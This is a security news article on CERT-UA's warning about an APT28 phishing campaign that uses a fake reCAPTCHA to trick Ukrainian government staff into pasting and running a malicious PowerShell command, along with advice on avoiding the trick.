Google’s reCAPTCHA bot defense has been armed
Ukraine’s Cyber Emergency Response Team has issued a new security warning after discovering a cyber attack campaign carried out by the APT28 threat group, also known as Fancy Bear. This group is believed, with a high degree of confidence, to be linked to Russian military intelligence operations. Here’s what we know so far and what to watch out for if you think you might be at risk of being targeted.
APT28 Fancy Bear Cyber Attack Campaign Alert from CERT-UA
The Ukrainian CERT alert, numbered CERT-UA#11689, was published on October 25 and, courtesy of Google’s site language translation tools, detailed an ongoing investigation into a phishing campaign using emails containing a table of data and a link that gives what appears to be a Google reCAPTCHA dialog for bot detection.
The frequency of these CAPTCHA anti-bot tools has decreased significantly for most users, in no small part due to the large number of browser extensions that help defeat them and the likes of iOS using Apple’s server-based automatic verification system for bypassing the need to fill them in yourself. However, it’s still not a completely unexpected event when one appears and, something that the Fancy Bear threat group is counting on, certainly not something that would raise suspicions in the user. If anything, it’s the opposite: using such anti-bot protection tends to suggest a reliable result rather than a dangerous one.
In the case of this cyberattack campaign, CERT-UA said that checking the checkbox asking for confirmation in response to the question “I’m not a robot” will initiate a malicious PowerShell command prompt to the user’s clipboard.
Mitigating the risk of falling victim to the CAPTCHA cyber attack
OK, so the most important point to make here is that the cyber attack campaign in question appears to be very targeted at local government employees in Ukraine. This immediately filters out a lot of concerns that everyone else might have. More importantly, though, that doesn’t mean the same techniques won’t be used by other threat actors now that the methodology is out there and apparently fooling some victims. Therefore, you should still be aware of the threat and how to mitigate it.
This brings me to the second important point here: the cyberattack is initiated by clicking a link (don’t do this) that causes the I’m not a robot dialog to appear first. If you get to this stage of such an attack, then more interaction is required to execute the campaign payload: the PowerShell command deploys a script that instructs the user to take a series of further steps.
These include: pressing a Win+R combination to open the command prompt, pressing a Win+V combination to paste the command to run the malware payload, and finally having to press enter to run it and install the malware itself. These are many steps that require a lot of trust from the user. Don’t be so trusting. Period. Ask yourself, when have I ever been asked to do something like this before? I’ll bet my house that the answer to that, for 99.9% of people is, erm, never. So why start now? With cyberattack campaigns, especially those involving AI-augmented phishing techniques, it’s easy to forget that most still rely on good old-fashioned trickery. Stay alert, don’t let work pressures or knee-jerk reactions make you take unnecessary risks, and you can also keep state-sponsored hackers at bay.